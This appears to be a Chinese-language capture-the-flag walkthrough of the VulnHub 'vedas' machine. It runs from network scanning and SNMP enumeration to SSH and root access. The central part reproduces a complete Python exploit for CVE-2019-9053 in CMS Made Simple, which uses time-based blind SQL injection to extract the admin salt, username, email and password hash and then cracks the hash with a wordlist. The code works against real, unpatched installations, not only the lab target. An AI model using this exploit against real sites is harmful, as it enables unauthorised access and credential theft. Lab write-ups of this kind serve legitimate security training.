渗透测试-CTF-VulnHub - vedas
arp-scan -l 扫描靶机IP地址
nmap -sV -Pn -A x.x.x.129
打开80端口,发现无可利用信息
打开msf,使用snmp_enum查看信息
输入靶机IP地址,获得第一个flag
使用cewl制作字典文件再次进行dirb遍历
dirb扫描
发现目录
查找CMS漏洞信息存在CVE-2019-9053
获取POC代码
import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib
url_vuln = 'http://10.10.10.128/Kashyapa/moduleinterface.php?mact=News,m1_,default,0&m1_idlist='
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
sleep_time = 1
username = ""
result = ""
email = ""
salt = ""
def get_salt():
global flag
global salt
global result
salt = ""
ord_salt = ""
ord_salt_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_salt = salt + dictionary[i]
ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
url = url_vuln + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= sleep_time:
flag = True
break
if flag:
salt = temp_salt
ord_salt = ord_salt_temp
flag = True
result += '\n[+] Salt for password found: ' + salt
def get_username(userid):
global flag
global username
global result
username = ""
ord_username = ""
ord_username_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_username = username + dictionary[i]
ord_username_temp = ord_username + hex(ord(dictionary[i]))[2:]
payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_users+where+username+like+0x" + ord_username_temp + "25+and+user_id%3d{id})+--+".format(id=userid)
url = url_vuln + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= sleep_time:
flag = True
break
if flag:
username = temp_username
ord_username = ord_username_temp
result += '\n[+] Username found: ' + username
flag = True
if username:
return True
else:
return False
def get_email(userid):
global flag
global email
global result
email = ""
ord_email = ""
ord_email_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_email = email + dictionary[i]
ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id%3d{id})+--+".format(id=userid)
url = url_vuln + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= sleep_time:
flag = True
break
if flag:
email = temp_email
ord_email = ord_email_temp
result += '\n[+] Email found: ' + email
flag = True
def get_password(userid):
global flag
global password
global result
password = ""
ord_password = ""
ord_password_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_password = password + dictionary[i]
ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_users"
payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id%3d{id})+--+".format(id=userid)
url = url_vuln + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= sleep_time:
flag = True
break
if flag:
password = temp_password
ord_password = ord_password_temp
flag = True
result += '\n[+] Password found: ' + password
def crack_password():
global password
global result
global salt
dict = open("/root/dic.txt") #修改生成的字典文件地址
for line in dict.readlines():
line = line.replace("\n", "")
if hashlib.md5(str(salt) + line).hexdigest() == password:
result += "\n[+] Password cracked: " + line
break
dict.close()
def beautify_print():
global result
cprint(result,'green', attrs=['bold'])
def main():
global result
for i in range(1, 10):
get_salt()
user_exist = get_username(i)
if user_exist:
get_email(i)
get_password(i)
crack_password()
beautify_print()
result = ""
else:
break
main()
登录
在Default Extensions中发现第二个flag
发现ssh登录,进行登录
进入opt/test 查看第三个flag
找到第三个flag
三个flag有个共同的点 Way to Root做字符串连接后 0e462097431906509019562988736854 查询密码结果 240610708
查看home目录下有vedas用户,登录root用户
在root目录下查看flag